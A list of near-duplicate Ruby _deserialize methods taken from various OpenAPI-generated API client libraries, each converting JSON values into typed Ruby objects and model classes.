"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Esi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Esi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Esi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Fastly.const_get(type)\n klass.respond_to?(:fastly_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n ::DateTime.parse(value)\n when :Date\n ::Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Models.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n ::DateTime.parse(value)\n when :Date\n ::Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Models.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :Time\n Time.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n # models (e.g. Pet) or oneOf\n klass = Hubspot::Cms::Performance.const_get(type)\n klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SmoochApi.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Tradenity.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = Tradenity.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = SamplifyAPIClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = OpsgenieClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = LemonWayClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = BudgeaClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = BudgeaClient.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :Boolean\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n Nodeum.const_get(type).build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TextMagic.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TextMagic.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = TextMagic.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n Date.parse value\n when :Date\n Date.parse value\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else\n # model\n temp_model = GroupDocsViewerCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n Date.parse value\n when :Date\n Date.parse value\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else\n # model\n temp_model = GroupDocsViewerCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n Date.parse value\n when :Date\n Date.parse value\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else\n # model\n temp_model = GroupDocsViewerCloud.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
"def _deserialize(type, value)\n case type.to_sym\n when :DateTime\n DateTime.parse(value)\n when :Date\n Date.parse(value)\n when :String\n value.to_s\n when :Integer\n value.to_i\n when :Float\n value.to_f\n when :BOOLEAN\n if value.to_s =~ /\\A(true|t|yes|y|1)\\z/i\n true\n else\n false\n end\n when :Object\n # generic object (usually a Hash), return directly\n value\n when /\\AArray<(?<inner_type>.+)>\\z/\n inner_type = Regexp.last_match[:inner_type]\n value.map { |v| _deserialize(inner_type, v) }\n when /\\AHash<(?<k_type>.+?), (?<v_type>.+)>\\z/\n k_type = Regexp.last_match[:k_type]\n v_type = Regexp.last_match[:v_type]\n {}.tap do |hash|\n value.each do |k, v|\n hash[_deserialize(k_type, k)] = _deserialize(v_type, v)\n end\n end\n else # model\n temp_model = ConnectWise.const_get(type).new\n temp_model.build_from_hash(value)\n end\n end",
